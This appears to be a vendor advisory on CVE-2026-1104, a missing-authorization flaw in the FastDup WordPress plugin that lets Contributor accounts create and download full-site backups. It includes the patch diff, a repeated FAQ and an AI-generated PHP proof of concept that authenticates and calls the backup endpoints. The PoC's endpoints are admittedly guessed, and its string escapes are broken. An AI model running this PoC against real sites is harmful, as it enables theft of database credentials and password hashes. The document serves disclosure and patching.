What is CVE-2026-1104?

CVE-2026-1104 is a high-severity vulnerability in the FastDup WordPress plugin, versions up to and including 2.7.1. It allows authenticated users with Contributor-level access and above to create and download full-site backups due to a missing authorization check in the REST API.

How does the vulnerability work?

The vulnerability arises from insufficient capability checks in the plugin’s REST API endpoints. Authenticated users can send requests to create and download backups, bypassing necessary permissions, which exposes sensitive data including database exports and configuration files.

Who is affected by this vulnerability?

Any WordPress site using the FastDup plugin version 2.7.1 or earlier is affected. Administrators should check their installed plugins for the version number to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the FastDup plugin installed. If it is version 2.7.1 or earlier, your site is susceptible to this vulnerability.

How can I fix CVE-2026-1104?

The vulnerability is patched in FastDup version 2.7.2. Administrators should update the plugin to the latest version immediately to mitigate the risk of exploitation.

What does a CVSS score of 8.8 indicate?

A CVSS score of 8.8 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk, allowing attackers to gain unauthorized access to sensitive data, potentially leading to a full site compromise.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to a complete compromise of the WordPress site. Attackers can access sensitive information such as user passwords and configuration data, enabling further attacks and control over the site.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker with Contributor access can authenticate to the WordPress site and exploit the vulnerability to create and download backup archives. It outlines the steps to send requests to the vulnerable REST API endpoints.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the FastDup plugin until it can be updated. Additionally, review user roles and limit access to Contributor accounts to minimize exposure.

Are there any other security measures I should take?

In addition to updating the plugin, ensure that your WordPress installation is secure by using strong passwords, limiting user roles, and implementing security plugins that monitor for unauthorized access.

How does this vulnerability affect my site's backups?

This vulnerability allows unauthorized users to create and download backups that include sensitive site data. It undermines the integrity of your backup processes and can lead to data breaches.

What is the role of the REST API in this vulnerability?

The REST API in WordPress allows for remote interactions with the site. In this case, the FastDup plugin’s REST API endpoints lacked proper authorization checks, enabling the exploitation of backup creation and download functionalities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1104: FastDup – Fastest WordPress Migration & Duplicator <= 2.7.1 – Missing Authorization to Authenticated (Contributor+) Backup Creation and Download (fastdup)

CVE ID CVE-2026-1104

Plugin fastdup

Severity High (CVSS 8.8)

CWE 862

Vulnerable Version 2.7.1

Patched Version 2.7.2

Disclosed February 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1104:
The FastDup WordPress plugin, versions up to and including 2.7.1, contains a missing authorization vulnerability in its REST API endpoints. This flaw allows authenticated users with the Contributor role or higher to create and download full-site backup archives, which contain the entire WordPress installation, database exports, and configuration files. The vulnerability has a high CVSS score of 8.8.

Atomic Edge research identifies the root cause as an insufficient capability check in the permission callback functions for two REST API endpoint classes. The vulnerable code resides in the `njt_fastdup_permissions_check` methods within `/fastdup/includes/Endpoint/PackageApi.php` and `/fastdup/includes/Endpoint/TemplateApi.php`. Both methods originally returned the result of `current_user_can(‘edit_posts’)`. The `edit_posts` capability is granted to Contributor-level users and above, which is insufficient for protecting sensitive backup operations.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker would send HTTP POST requests to the plugin’s REST API endpoints, specifically those registered under the `fastdup/v1` namespace for package and template management. A typical attack vector involves crafting a request to the backup creation endpoint, followed by a request to the download endpoint to retrieve the generated archive. No special parameters beyond those required for normal backup functionality are needed, as the vulnerability is purely an authorization bypass.

The patch, applied in version 2.7.2, modifies the capability check in both `njt_fastdup_permissions_check` methods from `current_user_can(‘edit_posts’)` to `current_user_can(‘manage_options’)`. The `manage_options` capability is typically exclusive to Administrator users in standard WordPress configurations. This change correctly restricts access to the backup functionality, ensuring only users with appropriate administrative privileges can perform these sensitive operations.

Successful exploitation leads to a complete site compromise. An attacker can obtain a full backup archive containing the WordPress database, which includes hashed user passwords, sensitive configuration data like database credentials in `wp-config.php`, and all uploaded media files. This data can facilitate further attacks, including password cracking, direct database access, and site cloning, effectively granting the attacker full control over the affected WordPress installation.

Differential between vulnerable and patched code

Code Diff

--- a/fastdup/fastdup.php
+++ b/fastdup/fastdup.php
@@ -4,7 +4,7 @@
  * Plugin Name:       FastDup
  * Plugin URI:        https://ninjateam.gitbook.io/fastdup/
  * Description:       WordPress Fastest Duplicator and Migration
- * Version:           2.7.1
+ * Version:           2.7.2
  * Author:            Ninja Team
  * Author URI:        https://ninjateam.org/
  * License:           GPLv2 or later
--- a/fastdup/includes/Endpoint/PackageApi.php
+++ b/fastdup/includes/Endpoint/PackageApi.php
@@ -368,6 +368,6 @@
    */
   public function njt_fastdup_permissions_check($request)
   {
-    return current_user_can('edit_posts');
+    return current_user_can('manage_options');
   }
 }
--- a/fastdup/includes/Endpoint/TemplateApi.php
+++ b/fastdup/includes/Endpoint/TemplateApi.php
@@ -283,6 +283,6 @@
    * @return WP_Error|bool
    */
   public function njt_fastdup_permissions_check($request) {
-    return current_user_can('edit_posts');
+    return current_user_can('manage_options');
   }
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1104 - FastDup – Fastest WordPress Migration & Duplicator <= 2.7.1 - Missing Authorization to Authenticated (Contributor+) Backup Creation and Download

<?php
// CONFIGURATION
$target_url = 'http://target-site.com'; // Base URL of the target WordPress site
$username = 'contributor'; // Username of an account with Contributor role or higher
$password = 'password'; // Password for the above account

// Step 1: Authenticate to WordPress and obtain a nonce (REST API authentication)
$auth_url = $target_url . '/wp-json/jwt-auth/v1/token';
$auth_data = array('username' => $username, 'password' => $password);
$auth_headers = array('Content-Type: application/json');

$ch = curl_init($auth_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($auth_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, $auth_headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
$auth_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code != 200) {
    die('Authentication failed. Check credentials or JWT plugin availability.n');
}

$auth_json = json_decode($auth_response, true);
$token = $auth_json['token'];
if (empty($token)) {
    die('Could not retrieve authentication token.n');
}

// Step 2: Trigger a full site backup creation via the vulnerable REST endpoint
// The endpoint is inferred from the plugin structure; actual endpoint may vary.
$create_backup_url = $target_url . '/wp-json/fastdup/v1/package/create';
$backup_headers = array(
    'Content-Type: application/json',
    'Authorization: Bearer ' . $token
);

$ch = curl_init($create_backup_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(array('name' => 'atomic_edge_exploit')));
curl_setopt($ch, CURLOPT_HTTPHEADER, $backup_headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$create_response = curl_exec($ch);
$create_http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo 'Backup creation request sent. HTTP Code: ' . $create_http_code . 'n';
echo 'Response: ' . $create_response . 'nn';

// Step 3: Attempt to list or download created backups
// This step demonstrates the ability to access backup data.
$list_backups_url = $target_url . '/wp-json/fastdup/v1/package/list';
$ch = curl_init($list_backups_url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $backup_headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$list_response = curl_exec($ch);
curl_close($ch);

echo 'Backup list retrieved:n';
echo $list_response . 'n';

// Note: A full exploit would parse the response for a backup ID and then call a download endpoint.
?>

Frequently Asked Questions

What is CVE-2026-1104?
Overview of the vulnerability
CVE-2026-1104 is a high-severity vulnerability in the FastDup WordPress plugin, versions up to and including 2.7.1. It allows authenticated users with Contributor-level access and above to create and download full-site backups due to a missing authorization check in the REST API.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient capability checks in the plugin’s REST API endpoints. Authenticated users can send requests to create and download backups, bypassing necessary permissions, which exposes sensitive data including database exports and configuration files.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the FastDup plugin version 2.7.1 or earlier is affected. Administrators should check their installed plugins for the version number to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the FastDup plugin installed. If it is version 2.7.1 or earlier, your site is susceptible to this vulnerability.
How can I fix CVE-2026-1104?
Updating the plugin
The vulnerability is patched in FastDup version 2.7.2. Administrators should update the plugin to the latest version immediately to mitigate the risk of exploitation.
What does a CVSS score of 8.8 indicate?
Understanding severity levels
A CVSS score of 8.8 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk, allowing attackers to gain unauthorized access to sensitive data, potentially leading to a full site compromise.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to a complete compromise of the WordPress site. Attackers can access sensitive information such as user passwords and configuration data, enabling further attacks and control over the site.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker with Contributor access can authenticate to the WordPress site and exploit the vulnerability to create and download backup archives. It outlines the steps to send requests to the vulnerable REST API endpoints.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the FastDup plugin until it can be updated. Additionally, review user roles and limit access to Contributor accounts to minimize exposure.
Are there any other security measures I should take?
Enhancing overall security
In addition to updating the plugin, ensure that your WordPress installation is secure by using strong passwords, limiting user roles, and implementing security plugins that monitor for unauthorized access.
How does this vulnerability affect my site's backups?
Impact on backup processes
This vulnerability allows unauthorized users to create and download backups that include sensitive site data. It undermines the integrity of your backup processes and can lead to data breaches.
What is the role of the REST API in this vulnerability?
Technical context
The REST API in WordPress allows for remote interactions with the site. In this case, the FastDup plugin’s REST API endpoints lacked proper authorization checks, enabling the exploitation of backup creation and download functionalities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations